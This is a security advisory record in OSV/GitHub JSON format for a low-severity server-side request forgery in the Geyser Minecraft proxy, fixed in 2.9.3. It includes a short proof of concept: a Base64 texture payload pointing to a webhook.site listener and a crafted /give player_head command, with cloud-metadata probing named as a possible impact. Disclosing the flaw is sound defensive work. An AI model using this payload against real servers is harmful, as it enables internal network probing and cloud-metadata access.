{"id":"GHSA-xcfg-fcr5-gw9r","summary":"Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser","details":"### Summary\nA server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data.\nBy supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints.\nThis occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.\n\n### Details\nGeyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.\n\nWhen a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution.\nHowever, the URL contained in the textures.SKIN.url field is not sufficiently validated.\n### PoC\n\n1. **Setup Environment:**\n   - Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.\n   - Ensure you have a Bedrock client connected.\n\n2. **Prepare Listener:**\n   - Go to [webhook.site](https://webhook.site) and obtain a unique URL (e.g., `https://webhook.site/YOUR-UUID`).\n\n3. **Construct Payload:**\n   - Create a JSON payload pointing to your listener URL:\n     `{\"textures\":{\"SKIN\":{\"url\":\"https://webhook.site/YOUR-UUID\"}}}`\n   - Encode this JSON string to Base64.\n     *(You can use a terminal command: `echo -n '{\"textures\":{\"SKIN\":{\"url\":\"...\"}}}' | base64`)*\n\n4. **Execute Command:**\n   - Run the following command in the Bedrock Edition client:\n   `/give @p minecraft:player_head[minecraft:profile={properties:[{name:\"textures\",value:\"[PASTE_BASE64_HERE]\"}]}]`\n\n5. **Verify:**\n   - Check the webhook.site dashboard.\n   - You will see an **HTTP GET request originating from the Minecraft Server's IP address**, not the client's IP.\n\n### Impact\nThis vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.\n\n#### Affected Parties\n- Minecraft servers running Geyser\n- Server operators exposing internal or cloud metadata endpoints\n\n#### Potential Impacts\n- Internal network probing (e.g., intranet services, admin panels)\n- Cloud metadata access attempts (e.g., 169.254.169.254)\n- IP address disclosure of the Minecraft server\n- Abuse of the server as an HTTP request proxy\n\nAlthough the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:\n- Network mapping\n- Firewall bypass attempts\n- Cloud environment fingerprinting","aliases":["CVE-2026-42188"],"modified":"2026-05-05T20:18:42.532742Z","published":"2026-05-05T20:03:16Z","database_specific":{"severity":"LOW","github_reviewed":true,"github_reviewed_at":"2026-05-05T20:03:16Z","cwe_ids":["CWE-918"],"nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r"},{"type":"PACKAGE","url":"https://github.com/GeyserMC/Geyser"}],"affected":[{"package":{"name":"org.geysermc.geyser:core","ecosystem":"Maven","purl":"pkg:maven/org.geysermc.geyser/core"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.9.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-xcfg-fcr5-gw9r/GHSA-xcfg-fcr5-gw9r.json","last_known_affected_version_range":"\u003c= 2.9.2"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N"}]}